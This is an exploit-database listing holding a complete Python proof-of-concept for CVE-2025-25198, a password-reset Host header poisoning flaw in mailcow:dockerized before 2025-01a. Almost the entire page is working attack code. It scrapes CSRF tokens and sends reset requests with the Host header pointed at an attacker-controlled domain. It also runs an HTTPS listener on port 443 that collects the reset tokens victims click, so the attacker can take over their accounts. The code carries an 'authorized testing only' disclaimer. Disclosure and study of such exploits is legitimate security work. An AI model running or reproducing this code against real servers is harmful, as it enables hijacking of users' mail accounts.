Lucene search
K

📄 mailcow: Dockerized Host Header Password Reset Poisoning

🗓️ 16 Feb 2026 00:00:00 · Reported by Iam Anthony Marcelo Alvarez Orellana · Type
packetstorm
 packetstorm
🔗 packetstorm.news · 👁 143 Views

Mailcow before 2025-01a is vulnerable to host header poisoning in password reset, enabling attacker-controlled links.

Related
Code
# Exploit Title: mailcow: dockerized < 2025-01a - Host Header Password Reset Poisoning (CVE-2025-25198)
    # Google Dork: N/A
    # Date: 2026-02-16
    # Exploit Author: Iam Alvarez (AKA Groppoxx / Maizeravla)
    # Vendor Homepage: https://mailcow.email
    # Software Link: https://github.com/mailcow/mailcow-dockerized
    # Version: < 2025-01a
    # Tested on: Ubuntu 22.04.5 LTS, Docker 26.1.3, Docker Compose 2.27.1; mailcow:dockerized 2025-01
    # CVE: CVE-2025-25198
    # PoC: https://github.com/Groppoxx/CVE-2025-25198-PoC.git
    
    # Description:
    # A flaw in mailcow’s password reset allows Host header poisoning to generate a
    # reset link pointing to an attacker-controlled domain, potentially enabling account
    # takeover if a user clicks the poisoned link. Patched in 2025-01a.
    
    # References:
    # - NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-25198
    # - Vendor advisory: https://github.com/mailcow/mailcow-dockerized/security/advisories/GHSA-3mvx-qw4r-fcqf
    
    # Impact:
    # Account takeover via poisoned password reset link.
    
    # Usage (authorized testing only):
    #   sudo python3 cve_2025_25198.py \
    #     --listen-host 0.0.0.0 \
    #     --base-url https://mail.target.tld \
    #     --username user@mail.target.tld \
    #     --attacker-host your.ip.or.dns \
    #     --http2
    
    # Note: The PoC sets the Host header to the attacker-controlled domain/IP
    # to demonstrate password reset link poisoning.
    
    # Requirements:
    #   Python 3.8+ ; pip install httpx  (or 'requests' for HTTP/1.1)
    #   openssl (to generate a self-signed cert for the local HTTPS listener)
    
    # Legal:
    #   For authorized security testing only. Do NOT target live websites.
    
    from __future__ import annotations
    
    import argparse
    import http.server
    import os
    import re
    import ssl
    import subprocess
    import sys
    import threading
    from datetime import datetime, timezone
    from http import HTTPStatus
    from http.server import SimpleHTTPRequestHandler
    from typing import Optional, Dict, List, Tuple
    from urllib.parse import urlparse, parse_qs
    
    try:
        import requests
    except Exception:
        requests = None
    
    # ANSI SGR escape sequences used to style terminal output.
    RESET = "\033[0m"  # SGR 0: clear all attributes
    BOLD = "\033[1m"  # SGR 1
    DIM = "\033[2m"  # SGR 2
    GREEN = "\033[32m"  # SGR 32: foreground color
    CYAN = "\033[36m"  # SGR 36: foreground color
    YELLOW = "\033[33m"  # SGR 33: foreground color
    MAGENTA = "\033[35m"  # SGR 35: foreground color
    
    # Matches one ANSI SGR sequence, e.g. "\x1b[1m" or "\x1b[0;32m".
    ANSI_RE = re.compile(r'\x1b\[[0-9;]*m')

    def visible_len(s: str) -> int:
        """Return the length of *s* not counting ANSI SGR escape sequences."""
        escape_chars = sum(len(match.group(0)) for match in ANSI_RE.finditer(s))
        return len(s) - escape_chars
    
    class Console:
        """Terminal output helper: timestamped progress lines and a boxed result banner."""

        def __init__(self, only_final: bool = False) -> None:
            # When true, log() prints nothing; banner() is unaffected.
            self.only_final = only_final

        def log(self, msg: str) -> None:
            """Print *msg* behind a dimmed UTC timestamp, unless ``only_final`` is set."""
            if not self.only_final:
                now_utc = datetime.now(timezone.utc)
                stamp = now_utc.isoformat(timespec="seconds").replace("+00:00", "Z")
                print(f"{DIM}[{stamp}]{RESET} {msg}", flush=True)

        def banner(self, link: str, source: str = "response") -> None:
            """Print *link* inside a box, with its hostname on a separate row when present.

            *source* is shown next to the title. The box is at least 80 and at
            most 150 columns wide; longer rows are printed unpadded.
            """
            hostname = urlparse(link).hostname or ""
            rows = [
                f"  {BOLD}{GREEN}RESET LINK FOUND!{RESET}  {DIM}({source}){RESET}",
                f"  {CYAN}{link}{RESET}",
            ]
            if hostname:
                rows.append(f"  Target: {BOLD}{hostname}{RESET}")

            # Width is computed on visible characters so color codes do not skew the box.
            widest = max(visible_len(row) for row in rows)
            inner_width = min(150, widest)
            if inner_width < 80:
                inner_width = 80
            rule = "═" * inner_width

            def box_line(content: str) -> str:
                padding = " " * max(0, inner_width - visible_len(content))
                return f"{MAGENTA}║{RESET}{content}{padding}{MAGENTA}║{RESET}"

            print("")
            print(f"{MAGENTA}╔{rule}╗{RESET}")
            print(box_line(rows[0]))
            print(f"{MAGENTA}╟{rule}╢{RESET}")
            for row in rows[1:]:
                print(box_line(row))
            print(f"{MAGENTA}╚{rule}╝{RESET}")
            print("")
    
    # Module-wide console; main() rebinds it after parsing --only-final.
    console = Console(False)
    
    # Token carried in a reset URL of the form "reset-password?token=<value>".
    RGX_TOKEN_IN_URL = re.compile(r'reset-password\?token=([^\s"&\'<>]+)', re.I)
    # Fallback: a bare token of 4-7 dash-separated hex groups, each 4-12 characters.
    RGX_TOKEN_FALLBACK = re.compile(r'\b([a-f0-9]{4,12}(?:-[a-f0-9]{4,12}){3,6})\b', re.I)

    def links_from_text(html: str, base_url: str) -> List[str]:
        """Build reset links on *base_url* for every token found in *html*.

        Tokens matched inside a ``reset-password?token=`` URL come first,
        followed by tokens matched by the bare-token fallback pattern.

        Args:
            html: Text to scan; an empty or ``None`` value yields ``[]``.
            base_url: Base URL the links are built on (trailing ``/`` ignored).

        Returns:
            Links in first-seen order, each appearing once.
        """
        if not html:
            return []
        prefix = f"{base_url.rstrip('/')}/reset-password?token="
        # A dict keeps insertion order, giving order-preserving de-duplication
        # across both patterns (the URL-pattern hits used to be appended as-is).
        links: Dict[str, None] = {}
        for rgx in (RGX_TOKEN_IN_URL, RGX_TOKEN_FALLBACK):
            for match in rgx.finditer(html):
                links.setdefault(prefix + match.group(1), None)
        return list(links)
    
    def links_from_headers(headers: Dict[str, str], base_url: str) -> List[str]:
        """Return reset links found in the ``Location`` header of *headers*.

        Args:
            headers: Response headers as a plain dict.
            base_url: Base URL passed through to ``links_from_text``.

        Returns:
            The links extracted from the header value, or ``[]`` when there is
            no non-empty ``Location`` header.
        """
        loc = headers.get("Location") or headers.get("location")
        if not loc:
            # Header field names are case-insensitive; a plain dict copy keeps
            # whatever casing was received, so fall back to a scan.
            loc = next(
                (value for key, value in headers.items()
                 if value and str(key).lower() == "location"),
                None,
            )
        return links_from_text(loc, base_url) if loc else []
    
    class ListenerState:
        """State shared between the listener's request handlers and the main loop."""

        def __init__(self) -> None:
            # Most recent link recorded by a request handler; None until one arrives.
            self.last_link: Optional[str] = None
            # Set by a request handler when it records a link.
            self.event = threading.Event()
    
    class LoggingHTTPSHandler(SimpleHTTPRequestHandler):
        """Request handler for the local HTTPS listener.

        GET and POST requests get a minimal response and a log line. When the
        request's query string carries a ``token`` parameter, a link built on
        the server's ``target_base_url`` is stored in the server's ``state``
        and the state's event is set.
        """

        server_version = "PoisonedHostTest/host-only"
        error_content_type = "text/plain"

        def log_message(self, *_: object) -> None:
            """Discard the base class's per-request log output."""
            return

        @staticmethod
        def _page(token: str) -> bytes:
            """Return the UTF-8 HTML body that echoes *token*, HTML-escaped."""
            # Local import keeps the file's top-level import block untouched.
            from html import escape

            # The token comes straight from the request line, so it is escaped
            # before being placed into markup.
            return (
                "<!doctype html><meta charset=utf-8><title>OK</title>"
                f"<p>token: <b>{escape(token)}</b></p>"
            ).encode("utf-8")

        def _record(self, code: int) -> None:
            """Store the link for a request carrying ``token`` and log the hit."""
            tokens = parse_qs(urlparse(self.path).query).get("token") or []
            if tokens:
                link = f"{self.server.target_base_url.rstrip('/')}/reset-password?token={tokens[0]}"
                self.server.state.last_link = link
                self.server.state.event.set()
            # console.log() is itself a no-op when only_final is set.
            console.log(f"{YELLOW}[HIT]{RESET} {self.command} {self.path} ← {self.client_address[0]} [{code}]")

        def do_GET(self) -> None:
            """Answer favicon requests with 204; otherwise echo the token and record the hit."""
            if self.path.startswith("/favicon"):
                self.send_response(HTTPStatus.NO_CONTENT)
                self.end_headers()
                return
            self.send_response(HTTPStatus.OK)
            self.send_header("Content-Type", "text/html; charset=utf-8")
            self.end_headers()
            token = parse_qs(urlparse(self.path).query).get("token", [""])[0]
            self.wfile.write(self._page(token))
            self._record(HTTPStatus.OK)

        def do_POST(self) -> None:
            """Drain the request body, answer 204 and record the hit."""
            raw_length = self.headers.get("Content-Length", "0") or 0
            try:
                # A negative value would make read() block until EOF.
                length = max(0, int(raw_length))
            except ValueError:
                # A malformed header is treated as "no body" instead of crashing.
                length = 0
            _ = self.rfile.read(length)
            self.send_response(HTTPStatus.NO_CONTENT)
            self.end_headers()
            self._record(HTTPStatus.NO_CONTENT)
    
    def ensure_self_signed(cert_file: str, key_file: str, cn: str = "localhost", days: int = 365) -> None:
        """Create a self-signed certificate and key with ``openssl`` unless both files exist.

        Args:
            cert_file: Path the certificate is written to.
            key_file: Path the unencrypted private key is written to.
            cn: Common Name placed in the certificate subject.
            days: Validity period passed to ``openssl``.

        Raises:
            subprocess.CalledProcessError: If ``openssl`` exits with a non-zero status.
        """
        already_present = os.path.exists(cert_file) and os.path.exists(key_file)
        if already_present:
            return
        console.log("[+] Generating self-signed certificate…")
        openssl_cmd = ["openssl", "req", "-x509", "-newkey", "rsa:2048"]
        openssl_cmd += ["-keyout", key_file, "-out", cert_file, "-days", str(days)]
        openssl_cmd += ["-nodes", "-subj", f"/CN={cn}"]
        subprocess.run(openssl_cmd, check=True)
    
    def require_root_for_privileged_port(port: int) -> None:
        """Exit with status 2 when *port* is below 1024 and the process is not root.

        The check applies only where ``os.geteuid`` exists (POSIX). On other
        platforms, and for ports >= 1024, the function returns without effect.

        Args:
            port: TCP port about to be bound.
        """
        if port >= 1024:
            return
        # Platforms without geteuid (e.g. Windows) are not checked.
        geteuid = getattr(os, "geteuid", None)
        if geteuid is not None and geteuid() != 0:
            # Report the port actually requested rather than a fixed number.
            print(f"[-] Port {port} requires root. Re-run with sudo.", file=sys.stderr)
            sys.exit(2)
    
    def start_https_listener(host: str, port: int, cert: str, key: str, base_url: str, state: ListenerState):
        """Start the TLS listener in a daemon thread and return the server object.

        Args:
            host: Interface to bind.
            port: Port to bind.
            cert: Certificate file (generated if it or *key* is missing).
            key: Private key file.
            base_url: Stored on the server as ``target_base_url`` for the handler.
            state: Stored on the server as ``state`` for the handler.

        Returns:
            The running ``ThreadingHTTPServer``.
        """
        ensure_self_signed(cert, key)
        server = http.server.ThreadingHTTPServer((host, port), LoggingHTTPSHandler)

        tls_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
        tls_context.load_cert_chain(certfile=cert, keyfile=key)
        server.socket = tls_context.wrap_socket(server.socket, server_side=True)

        # The request handler reads both attributes through self.server.
        server.target_base_url = base_url
        server.state = state

        worker = threading.Thread(target=server.serve_forever, name="https-listener", daemon=True)
        worker.start()
        console.log(f"[+] HTTPS listener on https://{host}:{port}")
        return server
    
    def add_cookie_string_to_session(session, cookie_header: Optional[str], base_url: str) -> None:
        """Copy ``name=value`` pairs from *cookie_header* into ``session.cookies``.

        Pairs are separated by ``;`` or ``,``. Pieces without ``=`` are skipped.
        Each cookie is set for the hostname of *base_url*.

        Args:
            session: Object exposing ``cookies.set(name, value, domain=...)``.
            cookie_header: Raw cookie string; ``None`` or empty does nothing.
            base_url: URL whose hostname becomes the cookie domain.
        """
        if not cookie_header:
            return
        domain = urlparse(base_url).hostname
        pieces = re.split(r';\s*|,\s*', cookie_header.strip())
        for piece in pieces:
            if "=" not in piece:  # also skips empty pieces
                continue
            name, _, value = piece.partition("=")
            try:
                session.cookies.set(name.strip(), value.strip(), domain=domain)
            except Exception:
                # Best effort: a cookie the session rejects is skipped.
                pass
    
    class HttpClient:
        """Thin wrapper giving ``httpx`` (HTTP/2) and ``requests`` (HTTP/1.1) one call shape.

        TLS verification is disabled on both backends and requests time out
        after 20 seconds.
        """

        def __init__(self, base_url: str, use_http2: bool, cookie_header: Optional[str]) -> None:
            """Create the backend session and preload cookies from *cookie_header*.

            Raises:
                RuntimeError: If the library needed for the chosen backend is missing.
            """
            self.base_url = base_url.rstrip("/")
            self.use_http2 = use_http2
            if not use_http2:
                if requests is None:
                    raise RuntimeError("Missing 'requests' for HTTP/1.1.")
                self.session = requests.Session()
            else:
                try:
                    import httpx
                except Exception as e:
                    raise RuntimeError("Install httpx for --http2:  pip install httpx") from e
                # TLS verification disabled intentionally for testing environments
                self.session = httpx.Client(http2=True, verify=False, timeout=20.0, follow_redirects=False)
            add_cookie_string_to_session(self.session, cookie_header, self.base_url)

        def get(self, url: str, headers: Dict[str, str], allow_redirects: bool):
            """Send a GET to *url* and return the backend's response object."""
            sent_headers = headers or {}
            if not self.use_http2:
                # requests: disable TLS verification explicitly
                return self.session.get(
                    url, headers=sent_headers, verify=False, timeout=20, allow_redirects=allow_redirects
                )
            return self.session.get(url, headers=sent_headers, follow_redirects=allow_redirects)

        def post(self, url: str, headers: Dict[str, str], data: Dict[str, str], allow_redirects: bool):
            """Send a form-encoded POST to *url* and return the backend's response object."""
            sent_headers = headers or {}
            form = data or {}
            if not self.use_http2:
                return self.session.post(
                    url, headers=sent_headers, data=form, verify=False, timeout=20,
                    allow_redirects=allow_redirects
                )
            return self.session.post(url, headers=sent_headers, data=form, follow_redirects=allow_redirects)
    
    RGX_INPUTS = [
        re.compile(r'name=["\']csrf_token["\']\s+value=["\']([0-9a-zA-Z_\-./+=:]+)["\']'),
        re.compile(r'name=["\']_csrf["\']\s+value=["\']([^"\']+)["\']'),
        re.compile(r'name=["\']csrf["\']\s+value=["\']([^"\']+)["\']'),
        re.compile(r'name=["\']csrf_token_reset["\']\s+value=["\']([^"\']+)["\']'),
    ]
    RGX_META = re.compile(r'<meta\s+name=["\']csrf-token["\']\s+content=["\']([^"\']+)["\']', re.I)
    RGX_JS = [
        re.compile(r'csrf_token\s*[:=]\s*["\']([^"\']+)["\']', re.I),
        re.compile(r'window\.\w*csrf\w*\s*=\s*["\']([^"\']+)["\']', re.I),
    ]
    COOKIE_CSRF = ["csrf_token", "_csrf", "XSRF-TOKEN", "CSRF-TOKEN"]
    HEX64 = re.compile(r'^[0-9a-f]{64}$', re.I)
    
    def _csrf_candidates_html(html: str) -> List[str]:
        if not html:
            return []
        cands: List[str] = []
        for rgx in RGX_INPUTS:
            m = rgx.search(html)
            if m: cands.append(m.group(1))
        m = RGX_META.search(html)
        if m: cands.append(m.group(1))
        for rgx in RGX_JS:
            m = rgx.search(html)
            if m: cands.append(m.group(1))
        for m in re.finditer(r'csrf_token=([0-9a-zA-Z_\-./+=:]{16,})', html):
            cands.append(m.group(1))
        seen: set[str] = set()
        out: List[str] = []
        for v in cands:
            if v not in seen:
                seen.add(v); out.append(v)
        return out
    
    def _csrf_from_set_cookie(headers: Dict[str, str]) -> Optional[str]:
        sc = headers.get("Set-Cookie") or headers.get("set-cookie")
        if not sc: return None
        for cookie in re.split(r',(?=\s*\w+=)', sc):
            for name in COOKIE_CSRF:
                m = re.search(rf'\b{name}=([^;,\s]+)', cookie, re.I)
                if m: return m.group(1)
        return None
    
    def _best_csrf(candidates: List[str]) -> Optional[str]:
        if not candidates: return None
        for c in candidates:
            if HEX64.fullmatch(c): return c
        return candidates[0]
    
    def nav_headers(base_url: str, attacker_host: str) -> Dict[str, str]:
        """Return browser-like navigation headers with ``Host`` set to *attacker_host*.

        ``Referer`` is *base_url* with exactly one trailing slash; ``Origin`` is
        *base_url* unchanged.
        """
        referer = base_url.rstrip("/") + "/"
        pairs = [
            ("User-Agent", "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"),
            ("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"),
            ("Accept-Language", "en-US,en;q=0.5"),
            ("Accept-Encoding", "gzip, deflate, br"),
            ("Upgrade-Insecure-Requests", "1"),
            ("Sec-Fetch-Dest", "document"),
            ("Sec-Fetch-Mode", "navigate"),
            ("Sec-Fetch-Site", "same-origin"),
            ("Sec-Fetch-User", "?1"),
            ("Te", "trailers"),
            ("Referer", referer),
            ("Origin", base_url),
            ("Host", attacker_host),
        ]
        return dict(pairs)
    
    def fetch_csrf_auto(client: HttpClient, base_url: str, attacker_host: str, username: str) -> str:
        """Obtain a CSRF token by probing the target, trying three strategies in order.

        1. GET a fixed list of paths with the navigation headers (custom ``Host``).
        2. GET the same paths again without the ``Host`` override.
        3. POST to ``/reset-password`` with an empty ``csrf_token``.

        For each response, a CSRF cookie in ``Set-Cookie`` is preferred over
        candidates found in the body. Request errors are logged and skipped.

        Raises:
            RuntimeError: If no strategy yields a token.
        """
        def token_from(resp) -> Optional[str]:
            # Cookie value wins; otherwise the best candidate from the body.
            body = resp.text if hasattr(resp, "text") else resp.content.decode("utf-8", "ignore")
            resp_headers = dict(getattr(resp, "headers", {}))
            return _csrf_from_set_cookie(resp_headers) or _best_csrf(_csrf_candidates_html(body))

        probe_paths = ["", "/", "/index.php", "/reset-password", "/login", "/auth", "/user/reset"]
        with_host = nav_headers(base_url, attacker_host)
        without_host = {k: v for k, v in with_host.items() if k != "Host"}

        for hdrs, label in ((with_host, ""), (without_host, " (no Host)")):
            for suffix in probe_paths:
                url = client.base_url + suffix
                try:
                    token = token_from(client.get(url, headers=hdrs, allow_redirects=True))
                    if token:
                        return token
                except Exception as e:
                    console.log(f"[!] CSRF GET{label} failed at {url}: {e}")

        pre_headers = {
            "User-Agent": with_host["User-Agent"],
            "Accept": with_host["Accept"],
            "Accept-Language": with_host["Accept-Language"],
            "Content-Type": "application/x-www-form-urlencoded",
            "Host": attacker_host,
            "Referer": base_url.rstrip("/") + "/",
            "Origin": base_url,
            "Upgrade-Insecure-Requests": "1",
        }
        form = {"username": username, "pw_reset_request": "", "csrf_token": ""}
        try:
            token = token_from(
                client.post(client.base_url + "/reset-password", headers=pre_headers,
                            data=form, allow_redirects=True)
            )
            if token:
                return token
        except Exception as e:
            console.log(f"[!] Preflight POST for CSRF failed: {e}")
        raise RuntimeError("Unable to auto-extract csrf_token.")
    
    def looks_like_csrf_error(body: str, status: int) -> bool:
        """Return True when *status* is 400/403 or *body* mentions a CSRF-style failure.

        The body check is a case-insensitive substring search; ``None`` or an
        empty body only matches through the status code.
        """
        if status == 400 or status == 403:
            return True
        lowered = body.lower() if body else ""
        markers = ("csrf", "invalid token", "expired token", "forgery", "bad token")
        for marker in markers:
            if marker in lowered:
                return True
        return False
    
    def run_sequence(client: HttpClient, base_url: str, username: str, csrf: str,
                    attacker_host: str) -> Tuple[Optional[str], Dict[str, object], str]:
        """Send GET, reset POST, GET with the custom ``Host`` header and scan for reset links.

        Links are taken from the three ``Location`` headers first, then from the
        three bodies, each in request order, with duplicates removed.

        Returns:
            ``(first_link_or_None, summary, post_body)``. ``summary`` holds the
            three status codes under ``get1`` / ``post`` / ``get2`` and the
            de-duplicated links under ``links_found``.
        """
        def body_of(resp) -> str:
            return resp.text if hasattr(resp, "text") else resp.content.decode("utf-8", "ignore")

        root = base_url.rstrip("/")
        headers = {
            "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
            "Accept-Language": "en-US,en;q=0.5",
            "Content-Type": "application/x-www-form-urlencoded",
            "Host": attacker_host,
            "Referer": root + "/",
            "Origin": base_url,
            "Upgrade-Insecure-Requests": "1",
        }

        # Request order is significant: landing page, reset request, landing page again.
        r1 = client.get(base_url, headers=headers, allow_redirects=True)
        body1 = body_of(r1)
        form = {"username": username, "pw_reset_request": "", "csrf_token": csrf}
        r2 = client.post(root + "/reset-password", headers=headers, data=form, allow_redirects=False)
        body2 = body_of(r2)
        r3 = client.get(root + "/", headers=headers, allow_redirects=False)
        body3 = body_of(r3)

        found: List[str] = []
        for resp in (r1, r2, r3):
            found.extend(links_from_headers(dict(getattr(resp, "headers", {})), base_url))
        for body in (body1, body2, body3):
            found.extend(links_from_text(body, base_url))
        # Order-preserving de-duplication.
        clean = list(dict.fromkeys(found))

        summary = {
            "get1": getattr(r1, "status_code", None),
            "post": getattr(r2, "status_code", None),
            "get2": getattr(r3, "status_code", None),
            "links_found": clean,
        }
        first = clean[0] if clean else None
        return first, summary, body2
    
    def attempt_once(base_url: str, username: str, attacker_host: str,
                    use_http2: bool,
                    cookie_header: Optional[str], csrf_override: Optional[str]) -> Tuple[Optional[str], Dict[str, object]]:
        """Run one full attempt, with a single retry on a CSRF-looking failure.

        A fresh client is created, the CSRF token is taken from *csrf_override*
        or extracted automatically, and the request sequence is sent. If no
        link is found, the token was auto-extracted and the POST response looks
        like a CSRF error, a new cookie-less client and token are used once more.

        Returns:
            ``(link_or_None, summary)`` from the last sequence that ran.
        """
        client = HttpClient(base_url, use_http2, cookie_header)
        if not csrf_override:
            csrf = fetch_csrf_auto(client, base_url, attacker_host, username)
            console.log(f"[+] Auto CSRF: {csrf[:16]}…")
        else:
            csrf = csrf_override
            console.log(f"[+] Using provided CSRF: {csrf[:16]}…")

        console.log("[>] Sending sequence with poisoned Host")
        link, summary, post_body = run_sequence(client, base_url, username, csrf, attacker_host)
        if link:
            return link, summary

        post_status = int(summary.get("post") or 0)
        # An explicitly supplied token is never rotated.
        if csrf_override or not looks_like_csrf_error(post_body, post_status):
            return link, summary

        console.log("[!] CSRF invalid/expired. Rotating session and retrying once…")
        client = HttpClient(base_url, use_http2, None)
        csrf2 = fetch_csrf_auto(client, base_url, attacker_host, username)
        console.log(f"[+] Auto CSRF (retry): {csrf2[:16]}…")
        link, summary, _ = run_sequence(client, base_url, username, csrf2, attacker_host)
        return link, summary
    
    def run_until_success(listen_host: str, base_url: str, username: str,
                        attacker_host: str, use_http2: bool,
                        interval: float, max_attempts: int,
                        cookie_header: Optional[str], csrf_override: Optional[str]) -> Optional[str]:
        """Start the listener and repeat attempts until a link is obtained.

        After each attempt without a link, the function waits up to *interval*
        seconds for the listener to signal a hit before trying again.

        Args:
            listen_host: Interface the HTTPS listener binds on (port 443).
            base_url: Target base URL.
            username: Account name submitted in the reset request.
            attacker_host: Value sent in the ``Host`` header.
            use_http2: Use the HTTP/2 client backend.
            interval: Seconds to wait for a listener hit between attempts.
            max_attempts: Attempt limit; ``0`` means unlimited.
            cookie_header: Optional cookie string for the client.
            csrf_override: Optional explicit CSRF token.

        Returns:
            The link found in a response or recorded by the listener, or
            ``None`` when attempts run out, the listener fired without a link,
            or the user interrupts.
        """
        # Force port 443 and require sudo/root on POSIX
        listen_port = 443
        require_root_for_privileged_port(listen_port)

        state = ListenerState()
        srv = start_https_listener(listen_host, listen_port, "server.pem", "server.key", base_url, state)
        try:
            attempt = 0
            while True:
                attempt += 1
                if max_attempts and attempt > max_attempts:
                    console.log("[i] Reached --max-attempts without success.")
                    return None
                try:
                    link, _summary = attempt_once(base_url, username, attacker_host, use_http2, cookie_header, csrf_override)
                except Exception as e:
                    # A failed attempt is logged and counts as "no link".
                    console.log(f"[!] Attempt #{attempt} error: {e}")
                    link = None
                if link:
                    console.banner(link, source="response")
                    return link
                if state.event.wait(timeout=interval):
                    link = state.last_link
                    if link:
                        console.banner(link, source="listener")
                    return link
                console.log(f"[i] Attempt #{attempt} yielded no link. Retrying in {int(interval)}s…")
        except KeyboardInterrupt:
            console.log("[+] Aborted by user.")
            return None
        finally:
            # shutdown() stops serve_forever(); server_close() then releases the
            # listening socket, which shutdown() alone leaves open.
            try:
                srv.shutdown()
                srv.server_close()
            except Exception as e:
                # Cleanup stays best-effort, but the failure is no longer hidden.
                console.log(f"[!] Listener cleanup error: {e}")
    
    def main() -> None:
        """Parse command-line options, run the attempt loop and print the outcome."""
        parser = argparse.ArgumentParser(
            description="Host header poisoning tester (Mailcow CVE-2025-25198) — HTTPS listener on port 443 (requires sudo/root), auto-cookie + auto-CSRF (or --csrf), retry, Host-only"
        )
        for required_flag in ("--listen-host", "--base-url", "--username", "--attacker-host"):
            parser.add_argument(required_flag, required=True)
        parser.add_argument("--http2", action="store_true", help="Use HTTP/2 (recommended)")
        parser.add_argument("--interval", type=float, default=8.0, help="Seconds between attempts and click wait window")
        parser.add_argument("--max-attempts", type=int, default=0, help="0=infinite; >0 limits attempts")
        parser.add_argument("--cookie", default=None, help="(Optional) inject cookies, e.g., PHPSESSID=...")
        parser.add_argument("--csrf", default=None, help="(Optional) provide csrf_token explicitly (auto if omitted)")
        parser.add_argument("--only-final", action="store_true", help="Hide progress; print only the final link banner")
        args = parser.parse_args()

        # Rebind the module-wide console so every helper honors --only-final.
        global console
        console = Console(only_final=args.only_final)

        if not args.http2:
            if requests is None:
                console.log("[!] Install 'requests' or use --http2 with 'httpx'.")
                sys.exit(2)
            console.log("[i] Running over HTTP/1.1 (requests). For best parity, use --http2.")

        link = run_until_success(
            listen_host=args.listen_host,
            base_url=args.base_url,
            username=args.username,
            attacker_host=args.attacker_host,
            use_http2=args.http2,
            interval=args.interval,
            max_attempts=args.max_attempts,
            cookie_header=args.cookie,
            csrf_override=args.csrf,
        )

        if args.only_final:
            return
        if link:
            print(f"{BOLD}{GREEN}Success:{RESET} reset link obtained. Exiting.")
        else:
            print("[i] No success (attempts exhausted or aborted).")
    
    # Run the command-line interface only when executed as a script, not on import.
    if __name__ == "__main__":
        main()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

16 Feb 2026 00:00 · Current
5.5 · Medium risk
Vulners AI Score: 5.5
CVSS 3.1: 7.1 - 8.8
EPSS: 0.05808
SSVC
143